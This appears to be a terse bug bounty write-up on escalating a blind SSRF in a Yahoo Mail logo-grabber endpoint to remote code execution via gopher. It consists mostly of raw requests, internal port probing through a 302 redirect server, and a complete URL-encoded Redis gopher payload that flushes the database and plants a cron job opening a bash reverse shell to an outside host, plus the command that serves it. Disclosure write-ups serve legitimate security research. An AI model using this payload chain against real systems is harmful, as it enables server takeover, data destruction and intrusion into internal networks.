Just Gopher It: Escalating a Blind SSRF to RCE for $15k — Yahoo Mail

Part 1: Recon

GET /xxx/logoGrabber?url=http://example.com
Host: mail.yahoo.com
...
{"responseTime":"99999ms","grabbedUrl":"http://example.com","urlInfo":{"pageTitle":"Example Title","pageLogo":"pagelogourl"}}

Part 2: Discovering SSRF

GET /xxx/logoGrabber?url=http://somecorpsite.yahoo.com
Host: mail.yahoo.com
...
{"responseTime":"9ms","grabbedUrl":"http://somecorpsite.yahoo.com","urlInfo":{"pageTitle":"INTERNAL PAGE TITLE","pageLogo":"http://somecorpsite.yahoo.com/logos/logo.png"}}

Part 3: The RCE

GET /xxx/logoGrabber?url=gopher://myburpcollaboratorurl
Host: mail.yahoo.com
...
GET /xxx/logoGrabber?url=http://my302redirectserver/
Host: mail.yahoo.com
...
GET /xxx/logoGrabber?url=http://my302redirectserver/
Host: mail.yahoo.com
...
GET /xxx/logoGrabber?url=http://my302redirectserver/
Host: mail.yahoo.com
...
302redirect → gopher://127.0.0.1:3306 [Response time: 3000ms]-CLOSED302redirect → gopher://127.0.0.1:9000 [Response time: 2500ms]-CLOSED302redirect → gopher://127.0.0.1:6379 [Response time: 500ms]-OPENetc…
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2469%0D%0A%0A%0A%2A/1%20%2A%20%2A%20%2A%20%2A%20bash%20-c%20%22sh%20-i%20%3E%26%20/dev/tcp/x.x.x.x/1337%200%3E%261%22%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2414%0D%0A/var/lib/redis%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
python3 302redirect.py port "gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2469%0D%0A%0A%0A%2A/1%20%2A%20%2A%20%2A%20%2A%20bash%20-c%20%22sh%20-i%20%3E%26%20/dev/tcp/x.x.x.x/1337%200%3E%261%22%0A
%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2414%0D%0A/var/lib/redis%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A"
GET /xxx/logoGrabber?url=http://my302redirectserver/
Host: mail.yahoo.com
...

big hax